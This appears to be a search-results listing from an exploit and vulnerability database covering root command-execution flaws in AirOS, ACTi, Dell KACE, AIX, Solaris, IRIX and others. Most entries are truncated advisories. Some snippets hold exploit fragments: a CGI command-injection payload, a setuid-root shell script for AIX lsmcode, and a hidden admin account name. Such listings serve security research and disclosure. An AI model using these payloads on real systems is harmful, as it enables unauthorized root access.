443 matches found
Ubiquiti AirOS 5.5.2 - (Authenticated) Remote Command Execution
!/usr/bin/python +--------------------------------------------------------------------------------------------------------------------------------+ Exploit Title : Ubiquiti AirOS 0x90.nl Software link : http://www.ubnt.com/eula/?BACK=/downloads/XM-v5.5.2.build14175.bin Vendor site :...
Dell KACE K2000 Web Backdoor Account
Nessus was able to log into the remote Dell KACE K2000 system using a hidden account. The hidden account, 'kbox1248163264128256', also has administrator privileges. A remote, unauthenticated attacker could exploit this issue to gain administrative access to the K2000 device. After gaining...
ACTi ASOC 2200 Web Configurator <= v2.6 Root Command Execution
Exploit for hardware platform in category remote exploits !perl ACTi ASOC 2200 Web Configurator + ACTi ASOC 2200 Web Configurator \n"; exit; if! $ARGV1 $cmd = "id"; my $result = get"http://$host/cgi-bin/test?iperf=;$cmd &"; if defined $result print " $cmd\n $result"; else print "- Not...
ACTi ASOC 2200 Web Configurator 2.6 Remote Root Command Execution
!perl ACTi ASOC 2200 Web Configurator + ACTi ASOC 2200 Web Configurator \n"; exit; if! $ARGV1 $cmd = "id"; my $result = get"http://$host/cgi-bin/test?iperf=;$cmd &"; if defined $result print " $cmd\n $result"; else print "- Not Vulnerable\n";...
MicroWorld eScan Antivirus Remote Root Command Execution
!/usr/bin/env python import sys from socket import auther: Mohammed almutairi [email protected] """ MicroWorld eScan Antivirus 1 if $POST'forgot' == "Send Password" $user = $POST"uname"; 2 insecure: vulnerable code in forgotpassword.php and commonfunctions.php in 1 $runasroot =...
DD-WRT v24-sp1 (XSRF) Cross Site Reference Forgery Exploit
No description provided by source. Remote root dd-wrt -------------------------------------------------------------------------------- Written by Michael Brooks Special thanks to str0ke Exploits tested on the newist stable version: Firmware: DD-WRT v24-sp1 07/27/08 micro Product Homepage:...
[Full-disclosure] MA[2005-0712b] - 'Nokia Affix Bluetooth btsrv/btobex poor use of system()'
DMA2005-0712b - 'Nokia Affix Bluetooth btsrv/btobex poor use of system' Author: Kevin Finisterre Vendor: http://www-nrc.nokia.com/affix/, http://affix.sourceforge.net Product: 'affix' References: http://www.digitalmunition.com/DMA2005-0712b.txt Description: Affix is a Bluetooth Protocol Stack for...
AIX 4.3/5.1 - 5.3 lsmcode Local Root Command Execution
No description provided by source. mkdirhier /tmp/aap/bin export DIAGNOSTICS=/tmp/aap cat /tmp/aap/bin/Dctrl EOF !/bin/sh cp /bin/sh /tmp/.shh chown root:system /tmp/.shh chmod u+s /tmp/.shh EOF chmod a+x /tmp/aap/bin/Dctrl lsmcode /tmp/.shh milw0rm.com 2004-12-21...
Fedora Core 2 : foomatic-3.0.1-3.1 (2004-303)
Sebastian Krahmer reported a bug in the cupsomatic and foomatic-rip print filters, used by the CUPS print spooler. An attacker who has printing access could send a carefully named file to the print server causing arbitrary commands to be executed as root. The Common Vulnerabilities and Exposures...
CVE-2002-1548
Unknown vulnerability in autofs on AIX 4.3.0, when using executable maps, allows attackers to execute arbitrary commands as root, possibly related to "string handling around how the executable map is called."...
CDRDAO 1.1.x - Home Directory Configuration File Symbolic Link (2)
CDRDAO 1.1.x - Home Directory Configuration File Symbolic Link 2 source: https://www.securityfocus.com/bid/3865/info CDRDAO is a freely available, open source CD recording software package available for the Unix and Linux Operating Systems. It is maintained by Andreas Mueller. When CDRDAO saves...
БОльшая дырка в Aptis Totalbill
Демон на одном из портов позволяет выполнять любые команды с привилегией root без авторизации...
gdm 1.0.x2.0.x BETA2.2.0 - XDMCP Buffer Overflow (2)
gdm 1.0.x2.0.x BETA2.2.0 - XDMCP Buffer Overflow 2 // source: https://www.securityfocus.com/bid/1233/info A buffer overrun exists in the XDMCP handling code used in 'gdm', an xdm replacement, shipped as part of the GNOME desktop. By sending a maliciously crafted XDMCP message, it is possible for ...
S.u.S.E Linux 4.x/5.x/6.x/7.0 / Slackware 3.x/4.0 / Turbolinux 6 / OpenLinux 7.0 - 'fdmount' Local Buffer Overflow (3)
// source: https://www.securityfocus.com/bid/1239/info A buffer overflow exists in the 0.8 version of the fdmount program, distributed with a number of popular versions of Linux. By supplying a large, well crafted buffer containing machine executable code in place of the mount point, it is possib...
S.u.S.E Linux 4.x/5.x/6.x/7.0 / Slackware 3.x/4.0 / Turbolinux 6 / OpenLinux 7.0 - 'fdmount' Local Buffer Overflow (2)
// source: https://www.securityfocus.com/bid/1239/info A buffer overflow exists in the 0.8 version of the fdmount program, distributed with a number of popular versions of Linux. By supplying a large, well crafted buffer containing machine executable code in place of the mount point, it is possib...
Solaris 2.6/7.0 - 'lpset -r' Local Buffer Overflow (3)
/ source: https://www.securityfocus.com/bid/1138/info A vulnerability exists in the handling of the -r option to the lpset program, as included in Solaris 7 from Sun Microsystems. The -r option is undocumented. As such, its use in unknown. However, when supplied a well crafted buffer containing...
CVE-1999-0163
In older versions of Sendmail, an attacker could use a pipe character to execute root commands...
CVE-1999-0003
Execute commands as root via buffer overflow in Tooltalk database server rpc.ttdbserverd...
CVE-1999-0003
Execute commands as root via buffer overflow in Tooltalk database server rpc.ttdbserverd...
SGI IRIX 6.2 - 'day5notifier' Local Privilege Escalation
!/bin/sh source: https://www.securityfocus.com/bid/345/info A vulnerability exists in the day5notifier program, shipped with Irix 6.2 from Silicon Graphics Inc. This program will allow any user to run any command as root. day5notifier wisely replaces a number of system calls with execve calls...